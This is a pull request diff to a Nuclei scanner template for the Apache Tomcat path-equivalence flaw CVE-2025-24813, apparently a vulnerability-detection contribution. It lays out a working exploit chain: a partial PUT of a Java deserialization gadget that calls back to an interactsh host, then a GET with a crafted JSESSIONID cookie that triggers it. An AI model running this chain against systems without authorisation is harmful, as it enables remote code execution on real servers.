### PR TITLE
fix: Apache Tomcat Path Equivalence

### DIFF
--- a/nuclei/CVE-2025-24813.yaml
+++ b/nuclei/CVE-2025-24813.yaml
@@ -29,15 +29,31 @@ info:
   tags: cve,cve2025,apache,tomcat,rce,intrusive
 
 variables:
+  check_filename: "{{randstr}}"
   filename: "{{randbase(6)}}"
 
-requests:
+# This template uses multiple http blocks for sequential, conditional checks.
+# Each http block is a step. If a matcher in a block fails, subsequent blocks are not executed.
+http:
+  # Step 1: Pre-flight Check for 404
+  - raw:
+      - |
+        GET /{{check_filename}}.txt HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+    matchers:
+      - type: status
+        status:
+          - 404 # Must be 404 to proceed
+
+  # Step 2: Exploit PUT, check for 201/204
+  # This block only runs if Step 1's matchers passed.
   - raw:
       - |
         PUT /{{filename}}.session HTTP/1.1
         Host: {{Hostname}}
-        Content-range: bytes 0-452/457
-        Content-Length: 337
+        Content-range: bytes 0-452/457 # Adjust size if payload changes
+        Connection: keep-alive
 
         {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
     matchers-condition: and
@@ -46,13 +62,18 @@ requests:
         status:
           - 201
           - 204
+        condition: or # PUT can be 201 or 204
 
+  # Step 3: Trigger GET and Final Interactsh Check
+  # This block only runs if Step 2's matchers passed.
   - raw:
       - |
-        GET /index.jsp HTTP/1.1
+        GET / HTTP/1.1
         Host: {{Hostname}}
+        Cookie: JSESSIONID=.{{filename}}
         Connection: close
-    matchers-condition: and
+    # No specific status matcher for the trigger GET itself here,
+    # the critical check is the Interactsh hit.
     matchers:
       - type: word
         part: interactsh_protocol

--- a/nuclei/CVE-2025-24813.yaml
+++ b/nuclei/CVE-2025-24813.yaml
@@ -52,7 +52,7 @@ http:
       - |
         PUT /{{filename}}.session HTTP/1.1
         Host: {{Hostname}}
-        Content-range: bytes 0-452/457 # Adjust size if payload changes
+        Content-range: bytes 0-452/457
         Connection: keep-alive
 
         {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}


### PR DESCRIPTION
- Adding a check to verify if the request for a non-existing file will return 404 (NOT FOUND) or 204 (NO CONTENT) before trying to PUT anything